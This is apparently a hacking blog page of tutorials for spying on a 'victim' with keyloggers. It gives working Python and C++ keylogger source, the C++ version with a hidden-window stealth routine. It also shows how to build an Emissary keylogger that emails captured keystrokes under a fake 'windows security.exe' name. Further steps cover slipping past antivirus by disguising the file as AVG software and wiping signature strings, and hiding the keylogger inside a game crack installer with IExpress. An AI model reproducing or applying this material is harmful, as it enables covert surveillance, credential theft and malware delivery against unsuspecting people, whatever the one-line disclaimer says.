Don't use this tutorials to harm any one -Admin

Liked us?

  • Facebook Rocks

    Go to Blogger edit html and replace these slide 1 description with your own words. ...

  • Facebook vs Twitter

    Go to Blogger edit html and replace these slide 2 description with your own words. ...

  • Facebook Marketing

    Go to Blogger edit html and replace these slide 3 description with your own words. ...

  • Facebook and Google

    Go to Blogger edit html and replace these slide 4 description with your own words. ...

  • Facebook Tips

    Go to Blogger edit html and replace these slide 5 description with your own words. ...

Create Keylogger to spy victim using Emissary Keylogger

In this post we will show you how to create a key logger file to hack secretly using emissary keylogger, using this we can easily create an server to import keystrokes of victim and also it can be used as a harming tool to disable Task manager, Registry edit.

SOFTWARE REQUIRED:
*Emissary key logger (Download link)

STEP 1: Extract & Open Emissary key logger Application from download.

STEP 2: Provide a Gmail ID and corresponding Password in these columns (To be safe create an fake Gmail id and use it)

 
STEP 3: Change the server name to anything you want with .exe extension. It should be undoubtful at any instance (ex: windows security.exe)

 
STEP 4 (optional): You can display any fake error messages to victim while opening the key logger file & you can make the victim automatically download any files you want

 
During execution it will display dialog box as

 
STEP 5: Finally click on “BUILD SERVER” and your key logger server will be created at your Emissary key logger directory




Note: This keylogger file is easily detectable by antivirus so read the article how to make an Keylogger undetectable to Antivirus.

Create Keylogger Using Python 2.7

In this tutorial we will show you how to create an own keylogger to record key strokes in PC directly using Python programming. Using this method you can spy any target computer with ease.

SOFTWARE USED:
*Phython 2.7 (Download link)

STEP 1: From the start menu select,” Python 2.7 > IDLE(Python GUI)”


STEP 2:  Click “File > New window”


STEP 3: Now type the below code in Phython window  as shown in fig.,

import win32api 
import sys
import pythoncom, pyHook
 
buffer = ''
def OnKeyboardEvent(event):
if event.Ascii == 5:
 
sys.exit()
 
if event.Ascii != 0 or 8:
 
f = open ('c:\\output.txt', 'a')
 
keylogs = chr(event.Ascii)
 
if event.Ascii == 13:
 
keylogs = keylogs + '\n'
 
f.write(keylogs)
 
f.close()
 
while True:
hm = pyHook.HookManager()
 
hm.KeyDown = OnKeyboardEvent
 
hm.HookKeyboard()
 
pythoncom.PumpMessages()



STEP 4 :Save the file in C:\ as Keylogger.py and click  RUN( CTRL + R: the keylogger will come started in the background and will run until the log file "C: \ output.txt" anything that will typed on the keyboard. )

Create Keylogger Using C++ program (Stealth function)

In this tutorial we will show you how to make an simple keylogger to record keystrokes of your PC which is operated in your absence by using Simple C++ program.

Tool’s Required:
*Dev c++  (or) Borland’s C++ (or) Turbo C++ (Download from here)

STEP 1: Create a New project file (File > New) and paste the following code in it

#include 
using namespace std;
#include
 
#include
 
int Save (int key_stroke, char *file);
void Stealth();
int main()
{
Stealth();
char i;
while (1)
{
for(i = 8; i <= 190; i++)
{
if (GetAsyncKeyState(i) == -32767)
Save (i,"LOG.txt");
}
}
system ("PAUSE");
return 0;
}
/* *********************************** */
int Save (int key_stroke, char *file)
{
if ( (key_stroke == 1) || (key_stroke == 2) )
return 0;
FILE *OUTPUT_FILE;
OUTPUT_FILE = fopen(file, "a+");
cout << key_stroke << endl;
if (key_stroke == 8)
fprintf(OUTPUT_FILE, "%s", "[BACKSPACE]");
else if (key_stroke == 13)
fprintf(OUTPUT_FILE, "%s", "\n");
else if (key_stroke == 32)
fprintf(OUTPUT_FILE, "%s", " ");
else if (key_stroke == VK_TAB)
fprintf(OUTPUT_FILE, "%s", "[TAB]");
else if (key_stroke == VK_SHIFT)
fprintf(OUTPUT_FILE, "%s", "[SHIFT]");
else if (key_stroke == VK_CONTROL)
fprintf(OUTPUT_FILE, "%s", "[CONTROL]");
else if (key_stroke == VK_ESCAPE)
fprintf(OUTPUT_FILE, "%s", "[ESCAPE]");
else if (key_stroke == VK_END)
fprintf(OUTPUT_FILE, "%s", "[END]");
else if (key_stroke == VK_HOME)
fprintf(OUTPUT_FILE, "%s", "[HOME]");
else if (key_stroke == VK_LEFT)
fprintf(OUTPUT_FILE, "%s", "[LEFT]");
else if (key_stroke == VK_UP)
fprintf(OUTPUT_FILE, "%s", "[UP]");
else if (key_stroke == VK_RIGHT)
fprintf(OUTPUT_FILE, "%s", "[RIGHT]");
else if (key_stroke == VK_DOWN)
fprintf(OUTPUT_FILE, "%s", "[DOWN]");
else if (key_stroke == 190 || key_stroke == 110)
fprintf(OUTPUT_FILE, "%s", ".");
else
fprintf(OUTPUT_FILE, "%s", &key_stroke);
fclose (OUTPUT_FILE);
return 0;
}
/* *********************************** */
void Stealth()
{
HWND Stealth;
AllocConsole();
Stealth = FindWindowA("ConsoleWindowClass", NULL);
ShowWindow(Stealth,0);
}
STEP 2:Now compile the program(Alt +F4) and make it to an executable server file(.exe)
STEP 3: Now when you click that .exe file you will be followed with an black screen blinking then each of the keystrokes are recorded to “LOG.txt’ at c directory

Make keylogger Undetectable

Welcome back readers, In this tutorial we are going to show you how to make an undetectable keylogger  to most antivirus programs (AVG,AVAST,KASPERSKY).Already we had showed you how to make an key logger in our previous tutorial, if you do not know about it first read that here


Tools required:

*Xenocode post build 2009 for .NET beta
*Hex workshop HEX editor

You can download these from this link (Download mirror)

Step 1: Initially disable your antivirus protection (Here I am using AVG antivirus Right click on AVG and click “Temporarily disable AVG protection” and select ” Until I restart next time”

 
Step 2: Install  Xenocode post build 2009 for .NET beta & Hex workshop HEX editor.Also don’t forget to use the crack
Step 3: Open Xenocode post build 2009 for .NET beta from program files and go to Application tab and click  “ADD” option from that and add your keylogger file (ie, already prepared through NEPTUNE keylogger or any other.Here)
 
 

Step 4: Now go to “VIRTUALIZE” tab and click “ENABLE” check box at left side. Then go to “GENERAL” tab there. Uncheck the “INHERIT PROPERTIES” tick box at right corner. Then change the product title, publisher, description, website, version to your desired (Here I use AVG v11.3.4, AVG corporation, AVG , www.avg.com ,AVG.(Optional:If you want to change the icon click “BROWSE “ option and select the required application and automatically it will change to that app icon.)
 

Step 5:Now click “XENOCODE APPLICATION “and save it.

Step 6: Now your keylogger file will appear as shown(With avg icon making it undetectable to victim)

Step 7: Now go to “Hex workshop HEX editor (32 bit)” from “All programs”
 
Step 8: click “File->open->your keylogger file
 
Step 9:  Press “Ctrl+F” which opens Find dialog box change type to “TEXT STRING” and search for “COPYRIGHT”
 
Step 10: It will show the result as follows 
 
Step 11: Now select these codes as shown in fig(....... inflate 1.2.3 copyright)



Step 12: Now right click on the selected area and click “FILL” option from that,then click OK.

 
 
Step 13: Result will change all binary codes to 00 as shown


Step 14: Then manually search for  “X.e.n.o.c.o.d.e. .V.i.r.t.u.a.l. .A.p.p.l.i.a.n.c.e. .R.u.n.t.i.m.e”(Ctrl+F feature cannot be used here, if required use Ctrl+F and search for letter X and find X.e.n.o.c.o.d.e)

Step 15: again as step 12 right click on the selected area and click “FILL” option from that, and then click OK.
 
Then it will look as
 
Step 16: click save option from File->save.
 
On that dialog box click Yes. Then it will be automatically saved to your key logger file.
Step 17:Turn back the antivirus and scan that key logger file.
 
Hurrah!!!!  Yes you made it ,an undetectable key logger J !!!This file is not detected by most antivirus (AVG,AVST,KASPERSKY)which is used by most of our friends. You cancheck it through online scanners as shown


Now send that keylogger file to your victim which would not be detected by his antivirus.
If you have any clarifications comment on these post and we will try to solve it at best

How to Bind two .exe files Using windows

Windows in default provides Iexpress applications which have the capability to act as a free Binding application, Iexpress applications are generally used by third party application designers for creating and designing their Windows installer. Iexpress can be generally used for various purposes in this tutorial we will show how to bind two .exe files.(This tutorial can be used for binding key logger files with any games or setup files to execute in a undoubtful way. This can be used to run key logger in an silent way similarly Trojan can also be used)















STEP 1: click windows key +r key combination to open RUN dialog box and enter “IEXPRESS”(without quotes )as shown and click “OK”.





STEP 2: Select “create new self extraction directive file” and click “Next”.


STEP 3: Select “Extract files and run an installation command” then click on “Next”

STEP 4: Provide an name for your installation package (ex: Prince of Persia trainer)


STEP 5: Select “NO Prompt” and click “NEXT” and select “Do not display a license” and click “Next”



STEP 6: From the next dialog box click “Add“ from menu and add the two .exe files to be binded (server+ application).Here I add two files POP crack +windows server(keylogger).Then click “Next”



STEP 7: Then from the next dialog box provide which program you want to install in User view and which one in hidden (In “Install program “provide your application in “Post install command” select your key logger). click “NEXT


STEP 8: Select “Hidden” from next menu and click “Next”



STEP 9: If you want to display any message to victim you can display here but it’s not necessary everywhere. Here I leave it empty by selecting “NO MESSAGE”


STEP 10: Here enter the save location for  your file by clicking “Browse”. Also don’t forget to select  “Hide File Extracting progress Animation from User”. click “Next”


STEP 11: On Configure restart tab select “only restart if needed” and click “Next”




STEP 12 : Now in “create Package “tab select “Next” and your package will be created at destination.


Finally your installation package is ready to be passed